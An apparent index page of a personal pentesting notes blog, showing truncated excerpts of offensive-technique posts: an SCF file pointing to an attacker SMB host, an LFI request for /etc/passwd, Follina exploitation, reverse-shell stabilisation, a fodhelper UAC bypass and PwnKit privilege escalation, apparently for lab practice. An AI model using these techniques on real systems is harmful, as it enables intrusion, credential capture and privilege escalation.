Shuciran Pentesting Notes

SMB Share with writting Permissions (SCF Attack)

SCF Attack SCF Attack First we need to write a file inside the share with writting permissions: (root㉿kali)-[/mnt/tempMount/Users/Public] └─# cat test.scf [Shell] Command=2 IconFile=\\10.10.14.4\...

Local File Inclusion

Simple LFI If an input is accepted on a URL parameter we can try to access any system file and check if whether or not it retrieves the file: http://10.11.1.35/section.php?page=/etc/passwd http://1...

Websocket Exploitation

Redirect traffic to TCP localhost port We can redirect the websocket traffic to a TCP localhost port so we can interact with it as if it were an HTTP port: from http.server import SimpleHTTPRequest...

SWAKS (Swiss Army Knife for SMTP)

Swaks is a featureful, flexible, scriptable, transaction-oriented SMTP test tool. Features include: SMTP extensions including TLS, authentication, pipelining, PROXY, PRDR, and XCLIENT Protoco...

Follina Exploitation

The following exploit Follina works pretty well, all you need to do is clone the repository and execute it as follows, the “-c” is the command to execute, it can be a cmd or a powershell intruction...

Fully Interactive TTY (Linux)

Python Once we get access to the victim machine we proceed to stabilize the shell: First we need to Ctrl + Z the shell as follows: tom@epsilon:/var/www/app$ ^Z zsh: suspended nc -lvnp 1235 Then t...

NodeJS

Read a file Create a file test.js with content: const fs = require('fs'); fs.readFile('/root/root.txt', 'utf-8', (err, data) =>{ if (err) throw err; console.log(data); }); To e...

Kerberos Exploitation

Authentication method gssapi-with-mic (krb5.conf file) If we receive the following message while trying to authenticate with any service: debug1: SSH2_MSG_EXT_INFO received debug1: kex_input_ext_in...

(UAC) Bypass - fodhelper.exe

UAC can be bypassed in various ways. This post is only a technique that allows an administrator user to bypass UAC by silently elevating our integrity level from medium to high. Most of the public...

Pkexec Privilege Escalation

PwnKit (ly4k) This PwnKit contains a pretty good PwnKit binary for PKEXEC. In order to exploit it, we need to download the PwnKit.c binary and compile from our Kali: (This is to compile with x32 ...